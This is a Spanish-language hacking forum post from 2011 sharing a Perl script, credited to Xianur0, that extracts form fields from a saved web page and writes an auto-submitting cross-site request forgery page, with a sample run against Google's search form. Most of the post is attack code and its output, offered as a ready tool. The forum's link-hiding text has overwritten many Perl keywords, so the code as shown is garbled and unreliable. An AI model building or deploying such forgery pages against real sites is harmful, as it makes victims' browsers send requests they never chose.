send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSRF Generator By Xianur0

  • 0 Respuestas
  • 1105 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado @ed33x

  • *
  • Underc0der
  • Mensajes: 107
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Enero 27, 2011, 08:48:52 pm »
Código: Perl
  1. #!/usr/bin/perl
  2.  
  3. #By Xianur0
  4. #uxmal666[at]gmail.com
  5.  
  6.   use HTML::Parser;
  7. $i = 1;
  8. $b = 1;
  9. my $parser = HTML::Parser->new(api_version=>3,
  10. start_h=>[\&parsear, 'tag, attr'] ,);
  11. You are not allowed to view links. Register or Login "\n\n                                       Generador XSRF By Xianur0\n\n\n";
  12.  
  13. $file = $ARGV[0] || You are not allowed to view links. Register or Login("Use: xsrf.pl [File]\n");
  14.  
  15. You are not allowed to view links. Register or Login(FILE,$file) || You are not allowed to view links. Register or Login "No pudo abrirse: $!";
  16. while(<FILE>) {
  17. $html.= $_;
  18. }
  19. You are not allowed to view links. Register or Login "\nBuscando Campos....\n";
  20. sub parsear {
  21.      my ($tag, $attr) = @_;
  22. if($tag =~ "form") {
  23. $name = $attr->{"name"};
  24. $valor = $attr->{"action"};
  25. $metodo = $attr->{"method"};
  26. if($metodo eq "") { $metodo = "GET"}
  27. You are not allowed to view links. Register or Login "\nFormulario ".$b.": ".$name."=>".$valor."=>".$metodo."\n";
  28.     $form{$b} = [$name, $metodo];
  29. $b++;
  30. }
  31. if($tag =~ "input") {
  32. $name = $attr->{"name"};
  33. $valor = $attr->{"value"};
  34. You are not allowed to view links. Register or Login "Campo ".$i.": ".$name."=>".$valor."\n";
  35.     $input{$i} = [$name, $valor];
  36. $i++;
  37. }
  38. }
  39. $parser->parse($html);
  40. You are not allowed to view links. Register or Login "\nTerminado Archivo Parseado!..\n\n";
  41. You are not allowed to view links. Register or Login "\nEscribe el Formulario a utilizar:\n";
  42. $forma=<STDIN>;
  43. You are not allowed to view links. Register or Login($forma);
  44. You are not allowed to view links. Register or Login "Cuantos Campos(input) utilizara?\n";
  45. $cantidad=<STDIN>;
  46. You are not allowed to view links. Register or Login($cantidad);
  47. for($o=1;$o<=$cantidad;$o++)
  48. {
  49. You are not allowed to view links. Register or Login "Formulario $o?\n";
  50. $inputa=<STDIN>;
  51. You are not allowed to view links. Register or Login($inputa);
  52. You are not allowed to view links. Register or Login "Desea Cambiar el Value? [y/n]\n";
  53. $respuesta=<STDIN>;
  54. You are not allowed to view links. Register or Login($respuesta);
  55. if($respuesta eq "y") {
  56. You are not allowed to view links. Register or Login "Escriba el Nuevo Valor:\n";
  57. $valu=<STDIN>;
  58. You are not allowed to view links. Register or Login($valu);
  59. } else { $valu = $input{$inputa}[1]; }
  60. $campos .='<input type="hidden" name="'.$input{$inputa}[0].'" value="'.$valu.'">';
  61. }
  62. You are not allowed to view links. Register or Login "Url Submit?\n";
  63. $url=<STDIN>;
  64. You are not allowed to view links. Register or Login($url);
  65. You are not allowed to view links. Register or Login "Generando XSRF Espere Por Favor...\n";
  66. $xsrf = '<!-- XSRF Generator By Xianur0 -->
  67. <form name="'.$form{$forma}[0].'" action="'.$url.'" method="'.$form{$forma}[1].'">'.$campos.'</form>
  68. <script>document.'.$form{$forma}[0].'.submit()</script>';
  69. You are not allowed to view links. Register or Login(LECTURA,">> xsrf.htm") || You are not allowed to view links. Register or Login "No pudo abrirse: $!";
  70. You are not allowed to view links. Register or Login LECTURA $xsrf;
  71. You are not allowed to view links. Register or Login(LECTURA);
  72. You are not allowed to view links. Register or Login "\n\nGenerado!: xsrf.html\n\n";

ejemplo estupido de uso:
entro a google y descargo el index:
despues:

Código: You are not allowed to view links. Register or Login
bt Desktop # perl xsrf.pl google.html


                                       Generador XSRF By Xianur0



Buscando Campos....

Formulario 1: f=>/search=>GET
Campo 1: hl=>es
Campo 2: q=>
Campo 3: btnG=>Buscar con Google
Campo 4: btnI=>Voy a tener suerte
Campo 5: meta=>
Campo 6: meta=>lr=lang_es
Campo 7: meta=>cr=countryMX

Terminado Archivo Parseado!..


Escribe el Formulario a utilizar:
1
Cuantos Campos(input) utilizara?
6
Formulario 1?
1
Desea Cambiar el Value? [y/n]
y
Escriba el Nuevo Valor:
en
Formulario 2?
2
Desea Cambiar el Value? [y/n]
y
Escriba el Nuevo Valor:
Xianur0
Formulario 3?
3
Desea Cambiar el Value? [y/n]
n
Formulario 4?
5
Desea Cambiar el Value? [y/n]
n
Formulario 5?
6
Desea Cambiar el Value? [y/n]
n
Formulario 6?
7
Desea Cambiar el Value? [y/n]
n
Url Submit?
http://www.google.com/search
Generando XSRF Espere Por Favor...


Generado!: xsrf.html

Resultado:

Código: You are not allowed to view links. Register or Login
<!-- XSRF Generator By Xianur0 -->
<form name="f" action="http://www.google.com/search" method="GET"><input type="hidden" name="hl" value="en"><input type="hidden" name="q" value="Xianur0"><input type="hidden" name="btnG" value="Buscar con Google"><input type="hidden" name="meta" value=""><input type="hidden" name="meta" value="lr=lang_es"><input type="hidden" name="meta" value="cr=countryMX"></form>
<script>document.f.submit()</script>

y se hace una busqueda con mi nick xD...

Saludos!
« Última modificación: Marzo 14, 2015, 09:52:34 am por Expermicid »
Me cambie de messenger ahora es: edeex@live.comYou are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



[Perl] XSS Generator 0.2

Iniciado por BigBear

Respuestas: 4
Vistas: 1335
Último mensaje Octubre 09, 2012, 12:23:13 pm
por BigBear
Viper 0.1 Priv8 Tool By Xianur0

Iniciado por @ed33x

Respuestas: 0
Vistas: 1469
Último mensaje Enero 27, 2011, 08:48:15 pm
por @ed33x